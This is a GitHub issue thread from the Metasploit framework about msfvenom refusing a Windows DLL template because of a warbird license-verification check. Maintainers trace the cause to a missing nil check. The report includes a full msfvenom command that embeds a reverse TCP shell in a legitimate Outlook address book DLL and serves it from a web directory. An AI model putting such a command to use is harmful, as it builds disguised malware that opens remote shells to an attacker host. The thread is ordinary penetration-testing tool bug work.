### ISSUE TITLE
Warbird check on Win2K3 dll

### ISSUE THREAD

**Issue by jaws1932** [rapid7/metasploit-framework#7569]
## Steps to reproduce
Windows 2003 Server

I was trying to use wab32res.dll from Outlook as the template to create a payload in which the outlook address book would still load, however, I hit the warbird check.

msfvenom -p windows/shell/reverse_tcp -x /root/Desktop/wab32res.dll -f dll -k -o /var/www/html/reverse4.dll LHOST=192.168.100.13 LPORT=8888 EXITFUNC=thread 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
No Arch selected, selecting Arch: x86 from the payload 
Found 1 compatible encoders 
Attempting to encode payload with 0 iterations of generic/none 
generic/none chosen with final size 354 
Payload size: 354 bytes 
Error: The template to inject to appears to have license verification (warbird)

I commented out the warbird check and the payload generated successfully and worked, however, this probably should be looked into.

Windows Server 2003 Standard

C:\Program Files\Common Files\System\wab32res.dll
MD5: EF8C3C2AB3D91C7F46B17969C1FBC5A0

### Metasploit version

Framework: 4.11.5-2015103001
Console  : 4.11.5-2015103001.15168

### I installed Metasploit with:
- [ X] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

Kali

**Comment by void-in** [comment]
The warbird was creating problems in injection on Windows 7 and later that is why the check was introduced in https://github.com/rapid7/metasploit-framework/pull/5660. It is better to use a template that is not protected by warbird since at the time of generating the payload it is not possible to determine where it is going to run.

**Comment by wchen-r7** [comment]
Hmmm ok, I will take a look. Thanks!

**Comment by wchen-r7** [comment]
It looks like I can reproduce the problem. Looking into it...

**Comment by wchen-r7** [comment]
I think I know what's wrong. The check is always expecting a text section in the user-supplied file, and if there isn't one, it actually returns true (as in it thinks it's a warbird file). It needs to check nil.
